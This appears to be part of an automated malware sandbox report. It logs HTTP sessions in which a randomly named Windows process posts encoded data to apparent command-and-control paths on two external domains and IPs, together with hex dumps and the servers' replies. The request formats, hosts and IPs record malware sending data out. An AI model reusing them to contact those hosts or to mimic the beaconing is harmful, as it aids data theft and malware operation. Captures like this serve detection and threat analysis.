                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.6 | 50022 | 43.155.76.124 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:53.857135057 CET | 810 | OUT | POST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4b 63 6d 41 6a 74 55 6c 51 41 4c 48 48 30 59 46 6a 34 77 37 49 51 57 4a 50 57 39 58 38 67 57 30 59 42 62 6f 30 68 51 70 47 71 44 35 4d 45 4c 63 52 4a 64 49 6a 57 6f 79 44 4d 51 67 54 48 31 73 4f 62 6b 30 6b 57 72 59 66 67 47 52 51 78 62 6f 70 64 5a 4b 63 50 74 54 6d 54 6f 47 52 59 5a 51 65 49 63 4e 78 54 65 49 6f 48 35 7a 61 2f 5a 6f 6c 38 68 54 79 47 79 62 30 55 37 31 41 6c 49 5a 79 75 46 64 49 4b 55 72 49 6b 62 4e 55 32 44 43 62 79 44 71 6c 67 4e 32 71 68 51 4b 53 57 64 52 38 4b 46 52 78 72 73 43 74 74 38 35 43 48 31 30 46 49 6a 72 74 53 50 56 61 4a 51 52 6a 6e 55 6b
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPKcmAjtUlQALHH0YFj4w7IQWJPW9X8gW0YBbo0hQpGqD5MELcRJdIjWoyDMQgTH1sObk0kWrYfgGRQxbopdZKcPtTmToGRYZQeIcNxTeIoH5za/Zol8hTyGyb0U71AlIZyuFdIKUrIkbNU2DCbyDqlgN2qhQKSWdR8KFRxrsCtt85CH10FIjrtSPVaJQRjnUk
                                                                                  Nov 20, 2024 08:33:54.729610920 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:54 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.6 | 50023 | 43.155.76.124 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:56.402523994 CET | 834 | OUT | POST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 79 30 59 67 72 6f 31 67 51 70 42 71 44 35 43 6b 4c 46 65 70 64 50 6a 57 6b 41 44 4a 77 67 54 48 68 73 4f 62 55 30 6c 6c 7a 58 64 77 47 70 45 42 62 75 6e 39 5a 4b 63 50 74 54 6d 54 38 73 52 59 78 51 65 59 73 4e 7a 79 65 4c 67 6e 35 77 51 66 5a 6f 79 73 68 66 79 47 7a 2b 30 56 6e 54 41 6e 41 5a 79 72 68 64 4a 59 38 73 47 6b 62 44 51 32 43 54 51 68 32 46 39 54 6f 57 69 67 55 57 4f 55 6f 75 30 63 59 4c 74 59 73 68 2f 39 63 37 43 46 74 47 46 6f 6a 42 76 53 33 56 49 65 63 32 73 54 78 48 57 53 56 4d 45 79 62 6f 61 4f 62 64 76 6f 78 2b 51 74 77 65 73 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8zy0Ygro1gQpBqD5CkLFepdPjWkADJwgTHhsObU0llzXdwGpEBbun9ZKcPtTmT8sRYxQeYsNzyeLgn5wQfZoyshfyGz+0VnTAnAZyrhdJY8sGkbDQ2CTQh2F9ToWigUWOUou0cYLtYsh/9c7CFtGFojBvS3VIec2sTxHWSVMEyboaObdvox+QtwesQ==
                                                                                  Nov 20, 2024 08:33:57.270441055 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:57 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.6 | 50025 | 43.155.76.124 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:58.945770025 CET | 1847 | OUT | POST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 36 30 59 79 6a 6f 30 48 38 70 41 71 44 35 4b 45 4c 59 65 70 64 65 6a 53 4a 4c 44 4a 39 56 54 42 74 73 50 34 63 30 73 30 7a 58 58 77 47 70 47 42 62 76 70 64 5a 6c 63 50 38 61 6d 54 73 73 52 59 78 51 65 65 41 4e 39 7a 65 4c 74 48 35 7a 61 2f 5a 6b 6c 38 67 43 79 46 43 44 30 56 7a 6c 42 57 67 5a 7a 4c 78 64 4c 73 63 73 4f 6b 62 42 64 57 43 4c 51 68 71 61 39 54 45 73 69 67 67 77 4f 55 4d 75 6e 6f 52 4c 36 62 38 39 2b 2b 6b 48 55 43 74 48 4f 39 4c 57 67 6a 54 46 4a 2b 42 65 6a 43 42 38 54 56 51 53 4e 79 43 72 56 66 76 72 6c 65 6b 69 64 76 64 74 76 4c 55 6a 32 7a 66 68 6d 4a 32 78 34 6f 69 73 38 39 62 46 67 34 69 53 46 51 48 37 36 77 34 4a 41 36 44 54 46 75 5a 42 61 50 61 37 45 69 76 48 56 72 77 36 4f 35 51 67 50 57 54 51 59 6f 72 36 58 76 4a 68 76 39 44 47 72 65 2f 37 4a 62 2b 35 6a 6b 53 42 76 32 56 6b 4e 55 63 45 72 2b 51 30 68 57 45 48 36 2b 32 32 78 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8z60Yyjo0H8pAqD5KELYepdejSJLDJ9VTBtsP4c0s0zXXwGpGBbvpdZlcP8amTssRYxQeeAN9zeLtH5za/Zkl8gCyFCD0VzlBWgZzLxdLscsOkbBdWCLQhqa9TEsiggwOUMunoRL6b89++kHUCtHO9LWgjTFJ+BejCB8TVQSNyCrVfvrlekidvdtvLUj2zfhmJ2x4ois89bFg4iSFQH76w4JA6DTFuZBaPa7EivHVrw6O5QgPWTQYor6XvJhv9DGre/7Jb+5jkSBv2VkNUcEr+Q0hWEH6+22xqOBUO+I6Nvb3fEhLRMmTLSBhM/76FsUFnzt9S+u0byBJk7aRHmnf9kFxhdYo9cA6ZZ41IaolEZA2e7GWPkK34qIXmbZG8mEbd9D9HKlOpWlr/9/m7hY5J1HGMGDsMKcRe/jjZaX3/WBrzF6kk+SSJGwg1FAgQmzvPRgl2R/ala9hDZAICAaUHHQcfjn7UA06geV2/QM+HBJ7bLGZbnUs7KqwjsQH1NX4glQK7K8eixvRgteAS7YeHJltN95QlDqwx/B/TRFi+owNGgSdboSKwiLKycxHXfaus9e4lsmvGExCPJx4VsZmWnj8otcHz6nkMpI7kfL/NMMFRb2RTHkR2Lxg4ECr5rVQgJw0wFEw8JaV9EhIF143rVcw30iL/EkaWOoo0pXiKCFbyXw+65wmD2uTP9ut2JTQTcPXbJahJRuiBTL9i1UPYC8A5Q1735rsFpRQOW1p0TC9sBA/17gn77RtH4NRcvX/685EFOol8oo2rIOpUOROAFyV8qqVyQuKzg9Yt0sNHJW38+/umZoFyxVAzANcNC0cotHXb49rS5sH7eggJUF6/9buY92qjbFtb/Kp4T5uJB21xiHISHAYI6oWy9M5hLda8mVLiYPo0UUoMLx3bb1Xy4OYJ5rqnyXq2YGLv0Qd/4Cfh2/HMJn4dkFtOiPT/FkyyI [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:59.818623066 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.6 | 50026 | 43.155.76.124 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:01.485373974 CET | 554 | OUT | GET /lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:02.362343073 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:34:02 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.6 | 50027 | 103.224.182.242 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:07.718615055 CET | 804 | OUT | POST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 68 6f 6f 59 71 39 32 43 41 37 47 54 39 43 33 5a 31 62 79 62 44 37 4f 71 6e 2b 30 6f 7a 6b 4e 67 42 70 47 6e 6c 4b 41 51 4d 57 6b 43 73 59 6c 58 6f 4c 43 71 70 7a 74 62 4d 61 41 52 43 35 6a 55 64 50 32 79 70 65 67 79 72 30 41 39 68 4f 65 59 4f 48 68 72 69 65 71 42 63 4a 41 50 61 73 65 4b 56 43 6b 4c 4d 59 6e 54 42 2f 4e 6e 47 5a 75 44 6a 47 30 49 2f 65 79 37 5a 39 54 48 34 4b 6f 51 74 61 6a 74 78 37 4e 61 4f 73 4b 4d 4c 6a 57 2b 2b 53 79 6d 63 2f 6b 54 63 2b 32 72 41 66 74 74 6a 59 75 72 5a 4d 6c 61 76 67 70 4b 61 2b 72 30 41 45 67 64 65 52 58 4d 55 44 4f 66 62 4e 6a
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFhooYq92CA7GT9C3Z1bybD7Oqn+0ozkNgBpGnlKAQMWkCsYlXoLCqpztbMaARC5jUdP2ypegyr0A9hOeYOHhrieqBcJAPaseKVCkLMYnTB/NnGZuDjG0I/ey7Z9TH4KoQtajtx7NaOsKMLjW++Symc/kTc+2rAfttjYurZMlavgpKa+r0AEgdeRXMUDOfbNj
                                                                                  Nov 20, 2024 08:34:08.318742990 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:08 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088048.1405750; expires=Sat, 18-Nov-2034 07:34:08 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.6 | 50028 | 103.224.182.242 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:10.327864885 CET | 828 | OUT | POST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 77 4e 68 6a 78 47 6d 6b 4b 41 65 73 57 6b 4a 4d 59 73 61 49 4c 56 71 70 76 4c 62 4d 32 41 52 44 64 6a 55 65 62 32 79 61 47 6a 7a 37 30 65 6b 78 4f 4c 46 2b 48 68 72 69 65 71 42 66 30 6c 50 61 6b 65 4b 41 53 6b 5a 2b 38 6b 4e 52 2f 4b 33 57 5a 75 48 6a 47 77 49 2f 65 41 37 59 77 32 48 2b 47 6f 51 73 71 6a 73 6b 62 4d 50 65 73 4d 50 37 69 67 37 4d 76 6e 69 65 4b 67 51 76 4f 68 32 42 58 73 73 56 46 30 33 71 4d 47 49 2f 41 72 4b 59 6d 5a 30 67 45 4b 66 65 70 58 65 44 50 70 51 76 6f 41 71 55 48 61 79 78 72 2b 46 71 56 58 43 43 76 6f 2b 54 77 69 58 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBwNhjxGmkKAesWkJMYsaILVqpvLbM2ARDdjUeb2yaGjz70ekxOLF+HhrieqBf0lPakeKASkZ+8kNR/K3WZuHjGwI/eA7Yw2H+GoQsqjskbMPesMP7ig7MvnieKgQvOh2BXssVF03qMGI/ArKYmZ0gEKfepXeDPpQvoAqUHayxr+FqVXCCvo+TwiXQ==
                                                                                  Nov 20, 2024 08:34:10.867294073 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:10 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088050.5135837; expires=Sat, 18-Nov-2034 07:34:10 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
